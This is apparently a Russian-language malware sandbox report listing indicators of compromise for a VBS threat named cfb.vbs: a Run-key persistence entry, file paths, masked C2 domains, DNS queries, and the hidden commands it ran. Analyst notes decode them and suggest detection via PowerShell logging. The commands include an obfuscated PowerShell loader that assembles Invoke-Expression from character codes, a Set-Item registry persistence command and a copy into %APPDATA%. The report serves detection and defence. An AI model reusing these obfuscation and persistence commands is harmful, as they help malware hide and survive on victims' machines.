Техническая информация
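- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\cfb.vbs ' (раздел автозапуска Run текущего пользователя; пустое имя — это значение раздела по умолчанию, его задаёт вызов Set-Item, приведённый ниже; записанный путь оканчивается пробелом, что стоит учитывать при поиске по точному совпадению)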
- C:\users\public\cfb.vbs
- %APPDATA%\cfb.vbs
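- 'ex##ple.com':443 (символы «#» в именах доменов здесь и ниже, по-видимому, скрывают часть имени; в таком виде записи не подходят для точного сопоставления с журналами DNS и прокси)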
- 'ja####murphy.com':443
- DNS ASK ex##ple.com
- DNS ASK google.com
- DNS ASK ja####murphy.com
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\cfb.vbs"
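- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$TeRRors789poRTers=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32...' (со скрытым окном)
  Примечание: [char]73, [char]69 и [char]88 — это символы «I», «E», «X»; команда sal (Set-Alias) назначает получившейся строке «IEX» (Invoke-Expression) псевдоним K. Видимая часть массива кодов декодируется в «$Tbone='*EX'.replace('*','I');sal M », то есть то же имя собирается ещё раз; продолжение команды в отчёте обрезано («...»). Полный текст выполненного сценария можно получить из журнала блоков сценариев PowerShell (событие 4104), если он включён.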
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\cfb.vbs '' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "C:\Users\Public\cfb.vbs " "%APPDATA%\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$TeRRors789poRTers=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\cfb.vbs '
- '<SYSTEM32>\cmd.exe' /c copy "C:\Users\Public\cfb.vbs " "%APPDATA%\" /Y